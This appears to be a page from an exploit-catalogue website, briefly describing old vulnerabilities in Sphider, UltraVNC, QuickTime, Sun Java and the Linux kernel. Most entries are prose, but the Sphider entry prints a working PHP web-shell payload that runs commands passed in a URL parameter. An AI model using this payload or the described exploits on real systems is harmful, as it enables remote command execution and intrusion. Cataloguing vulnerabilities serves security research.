header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Sphider <= 1.3 arbitrary remote inclusion

Sphider <= 1.3 is vulnerable to arbitrary remote inclusion. This exploit works with register_globals = On & allow_url_fopen = On. The exploit requires a code to be included in the remote location which is then used to execute the command. The code is as follows: <?php ob_clean();if (get_magic_quotes_gpc()){$_GET["cmd"]=stripslashes($_GET["cmd"]);}ini_set("max_execution_time",0);echo 56789;passthru($_GET["cmd"]);die;?>

Ultr@VNC 1.0.1 Client Buffer Overflow

A buffer overflow vulnerability exists in Ultr@VNC 1.0.1 Client. An attacker can send a specially crafted packet to the VNC server port (5900) to trigger a buffer overflow and execute arbitrary code on the target system. This vulnerability was discovered by Luigi Auriemma and a proof-of-concept was developed by Paul Haas at Redspin.com. The exploit was tested on Windows XP SP2 and launches calc.exe.

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR.

Sun Java Runtime New Plugin docbase Buffer Overflow

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a 'launchjnlp' parameter, it will copy the contents of the 'docbase' parameter to a stack-buffer using the 'sprintf' function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address.

Linux Kernel 2.6.16.x OOM Killer Local Denial of Service Vulnerability

This exploit is a local denial of service vulnerability in the Linux Kernel 2.6.16.x. It creates multiple threads that consume all available memory, causing the system to crash. The exploit uses the setsid() system call to avoid being counted as one thread in the oom_killer().

Recent Exploits: